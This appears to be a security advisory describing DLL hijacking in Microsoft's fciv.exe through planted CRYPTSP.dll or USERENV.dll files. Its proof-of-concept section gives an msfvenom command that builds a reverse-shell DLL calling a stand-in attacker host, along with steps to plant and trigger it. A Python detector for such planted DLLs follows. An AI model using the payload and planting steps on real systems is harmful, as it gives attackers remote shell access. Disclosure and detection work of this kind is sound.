Microsoft File Checksum DLL Hijacking Attack

The File Checksum Integrity Verifier process, fciv.exe, will load and execute malicious Dynamic Link Libraries (DLLs) carrying the following vulnerable names:

CRYPTSP.dll
USERENV.dll

Exploitation occurs when crafted DLL files with these names are placed in the same directory as FCIV.

So if an attacker is able to place one of these DLLs in that directory, running the file verification will load the malicious DLL directly.

PoC

  • Generate a reverse TCP shell payload as a DLL using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=attackerip LPORT=4444 -f dll > /root/CRYPTSP.dll

  • Place the DLL file in the same directory as the fciv executable.

  • Execute fciv.exe; the malicious DLL is loaded from the working directory:

fciv.exe CRYPTSP.dll
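For the defensive side, the following is an added example (not part of the original advisory or of FCIV itself) that checks a directory for the planted-DLL condition described above: if fciv.exe is present, any file beside it named CRYPTSP.dll or USERENV.dll is flagged and hashed for triage, since a clean install resolves those libraries from System32 rather than the application directory. The sample directory it builds is constructed placeholder content, and the function and file names are the example's own.

```python
import hashlib
import tempfile
from pathlib import Path

# DLL names the advisory reports fciv.exe resolving from its own directory.
HIJACKABLE_DLLS = ("cryptsp.dll", "userenv.dll")


def sha256_of(path):
    """SHA-256 of a file, streamed so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_planted_dlls(directory):
    """Return [(filename, sha256)] for hijack-prone DLLs sitting beside fciv.exe.

    Only a directory that actually contains fciv.exe is examined; an empty list
    means nothing suspicious was found. The DLLs are never loaded or parsed:
    a benign install keeps CRYPTSP.dll and USERENV.dll in System32, so any copy
    next to the executable is worth quarantining and triaging by hash.
    """
    d = Path(directory)
    if not (d / "fciv.exe").is_file():
        return []
    hits = [p for p in d.iterdir()
            if p.is_file() and p.name.lower() in HIJACKABLE_DLLS]
    return sorted((p.name, sha256_of(p)) for p in hits)


def build_sample_dir():
    """Constructed layout for the demo: a stand-in fciv.exe with a planted CRYPTSP.dll.

    The files are byte placeholders, not the real binary or a real DLL.
    """
    d = Path(tempfile.mkdtemp(prefix="fciv-check-"))
    (d / "fciv.exe").write_bytes(b"MZ placeholder, not the real fciv binary")
    (d / "CRYPTSP.dll").write_bytes(b"MZ placeholder, not a real DLL")
    (d / "readme.txt").write_bytes(b"unrelated file, must not be flagged")
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    for name, digest in find_planted_dlls(sample):
        print(f"suspicious DLL beside fciv.exe: {name} sha256={digest}")
```

The check is deliberately name-based rather than content-based: the mitigation is the same regardless of what the DLL contains, namely removing it and keeping fciv.exe in a directory that only administrators can write to, so that the loader's search of the application directory cannot be abused.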

Reference

http://hyp3rlinx.altervista.org/advisories/MICROSOFT-FILE-CHECKSUM-VERIFIER-v2.05-DLL-HIJACKING-ARBITRARY-CODE-EXECUTION.txt